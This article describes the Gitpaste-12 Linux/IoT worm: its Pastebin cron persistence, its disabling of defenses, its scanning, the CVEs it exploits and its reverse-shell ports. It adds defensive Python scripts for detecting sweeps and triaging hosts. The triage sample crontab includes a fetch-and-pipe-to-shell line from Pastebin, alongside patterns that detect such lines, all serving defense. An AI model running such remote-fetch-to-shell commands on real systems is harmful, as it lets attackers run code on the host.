Security researchers have identified a new worm targeting Linux x86 servers and Linux-based internet of things (IoT) devices. The malware has been named Gitpaste-12 because it hosts its components on GitHub and Pastebin and carries 12 known attack modules for compromising systems.
Juniper Threat Labs observed the first Gitpaste-12 attacks on October 15, 2020, and reported both the Pastebin URL and the GitHub repository used by the worm; the repository was shut down on October 30, 2020.
The worm spreads on its own: once inside an organization it can move laterally, and compromised hosts are used to attack other networks across the internet, which makes containment difficult.
The first stage is the compromise of an initial system. Gitpaste-12 currently has 12 known attack modules, with more under development.
To gain access, the worm tries known exploits against exposed services and also attempts to brute-force passwords.
Once a system is compromised, the malware installs a cron job that fetches a script from Pastebin and runs it; the job re-downloads and re-runs the same script every minute, so any change to the paste is pushed to the entire botnet on the next run.
The script first prepares the environment by stripping the host of its defenses: it flushes firewall rules, disables SELinux and AppArmor, and stops common attack-prevention and monitoring agents.
Gitpaste-12 also carries a script that launches attacks against other machines; its purpose is to replicate and spread as widely as possible.
The scanner picks a random /8 CIDR block and attempts to attack every address within that range.
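The random-/8 sweep described above has a network-side signature: a single source fanning out to a large number of distinct destinations that all fall inside one /8, regardless of which /8 was chosen. The following is an added illustration, not Gitpaste-12 code or a Juniper detection; the flow records are constructed, and the `min_targets` threshold is an assumption a defender would tune to their own baseline.

```python
"""Flag hosts that fan out across a single /8, the spreading pattern of the worm.

Added example, not code from the original article. Input is a constructed list
of (src, dst, dport) connection records such as a NetFlow or firewall export.
"""
from collections import defaultdict
import ipaddress

# Constructed sample: 192.0.2.10 sweeps 10.0.0.0/8 on the HTTP ports the worm's
# router/camera exploits target; 192.0.2.20 shows ordinary traffic.
SAMPLE_FLOWS = [
    ("192.0.2.10", f"10.{i}.{(i * 7) % 256}.{(i * 13) % 256}", [80, 8080, 443][i % 3])
    for i in range(40)
] + [
    ("192.0.2.20", "198.51.100.5", 443),
    ("192.0.2.20", "198.51.100.6", 443),
    ("192.0.2.20", "203.0.113.9", 22),
]


def slash8(ip):
    """First octet of an IPv4 address, identifying its /8 block."""
    return int(ipaddress.IPv4Address(ip)) >> 24


def sweep_candidates(flows, min_targets=25):
    """Return {src: (first_octet, distinct_dst_count)} for every source whose
    number of distinct destinations inside one /8 reaches min_targets.

    Because the worm picks the /8 at random, the detector keys on fan-out
    within a single block rather than on any particular address range.
    """
    per_src = defaultdict(lambda: defaultdict(set))
    for src, dst, _port in flows:
        per_src[src][slash8(dst)].add(dst)

    flagged = {}
    for src, blocks in per_src.items():
        block, dsts = max(blocks.items(), key=lambda kv: len(kv[1]))
        if len(dsts) >= min_targets:
            flagged[src] = (block, len(dsts))
    return flagged


if __name__ == "__main__":
    for src, (block, count) in sweep_candidates(SAMPLE_FLOWS).items():
        print(f"{src} touched {count} distinct hosts in {block}.0.0.0/8")
```

On real data the threshold should sit well above the fan-out of legitimate scanners and monitoring systems in the environment, and the same grouping can be applied per destination port to separate a service-specific sweep from general discovery.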
Exploits of Gitpaste-12
Gitpaste-12 uses the following exploits:
- CVE-2017-14135: OpenDreambox webadmin plugin
- CVE-2020-24217: HiSilicon-based IPTV/H.264/H.265 video encoders
- CVE-2017-5638: Apache Struts 2
- CVE-2020-10987: Tenda router
- CVE-2014-8361: miniigd SOAP service in the Realtek SDK
- CVE-2020-15893: UPnP in D-Link routers
- CVE-2013-5948: ASUS routers
- EDB-ID 48225: Netlink GPON router
- EDB-ID 40500: AVTECH IP camera
- CVE-2019-10758: mongo-express (MongoDB web administration interface)
- CVE-2017-17215: Huawei HG532 router
Security researchers consider worms particularly troublesome because their defining capability is automated spread: once inside an organization, a worm moves laterally on its own.
It also uses the hosts it has compromised to attack other networks across the internet; in addition, this worm gives the threat actors reverse shells.
According to the researchers, some infected systems have been observed listening on TCP ports 30004 and 30005 for shell commands.
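The persistence mechanism (an every-minute cron job pulling a script from Pastebin), the defense stripping and the listener on TCP 30004/30005 all leave host-level traces that can be checked during triage. The following is an added example written for this article, not code from Juniper or from the worm; it parses constructed samples of a crontab and of `/proc/net/tcp`, and the paste ID and inode values in the samples are placeholders. It reads kernel state from `/proc` rather than calling `netstat` or `ss`, because a worm that removes monitoring software cannot be trusted to have left user-space tools intact.

```python
"""Host triage checks for the persistence and listener behaviour described above.

Added example, not code from the original article. All inputs below are
constructed samples; on a live host, pass the output of `crontab -l`, the
contents of /etc/cron.d/*, and the text of /proc/net/tcp instead.
"""
import re

# Hosts the worm is known to fetch its components from (from the article).
REMOTE_SCRIPT_HOSTS = ("pastebin.com", "github.com", "raw.githubusercontent.com")
# Ports reported as listening for shell commands on infected systems.
GITPASTE_PORTS = {30004, 30005}
CRON_FIELDS = 5

# Constructed crontab: one benign job, one every-minute fetch-and-pipe-to-shell job.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * curl -fsSL https://pastebin.com/raw/XXXXXXXX | sh
*/5 * * * * /usr/local/bin/backup.sh
"""

# Constructed /proc/net/tcp: sshd on 22, a listener on 0x7534 = 30004, smtp on 25.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10001 1 0000000000000000 100 0 0 10 0
   1: 00000000:7534 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10002 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 10003 1 0000000000000000 100 0 0 10 0
"""


def suspicious_cron_entries(crontab_text):
    """Return cron lines that fetch from a paste/repo host and either run every
    minute or pipe the download straight into a shell."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, CRON_FIELDS)
        if len(fields) <= CRON_FIELDS:
            continue
        schedule, command = fields[:CRON_FIELDS], fields[CRON_FIELDS]
        every_minute = schedule == ["*"] * CRON_FIELDS
        fetches_remote = any(host in command for host in REMOTE_SCRIPT_HOSTS)
        pipes_to_shell = re.search(r"\|\s*(ba)?sh\b", command) is not None
        if fetches_remote and (every_minute or pipes_to_shell):
            hits.append(line)
    return hits


def listening_ports(proc_net_tcp_text):
    """Parse /proc/net/tcp and return the set of TCP ports in LISTEN (st == 0A).
    The local_address column is hex 'IP:PORT'; the header line is skipped."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 4:
            continue
        local, state = parts[1], parts[3]
        if state == "0A":
            ports.add(int(local.split(":")[1], 16))
    return ports


def gitpaste_listener_ports(proc_net_tcp_text):
    """Ports from the reported 30004/30005 pair that are currently listening."""
    return listening_ports(proc_net_tcp_text) & GITPASTE_PORTS


def triage(crontab_text, proc_net_tcp_text):
    """Combine both checks into one findings dict for a host."""
    return {
        "suspicious_cron": suspicious_cron_entries(crontab_text),
        "gitpaste_ports_listening": sorted(gitpaste_listener_ports(proc_net_tcp_text)),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CRONTAB, SAMPLE_PROC_NET_TCP))
```

A listener on 30004 or 30005 by itself is only a lead, since the port pair is not reserved; combine it with the cron finding and with the state of SELinux, AppArmor and the firewall (`getenforce`, `/sys/module/apparmor/parameters/enabled`, `iptables -S`) before treating the host as infected.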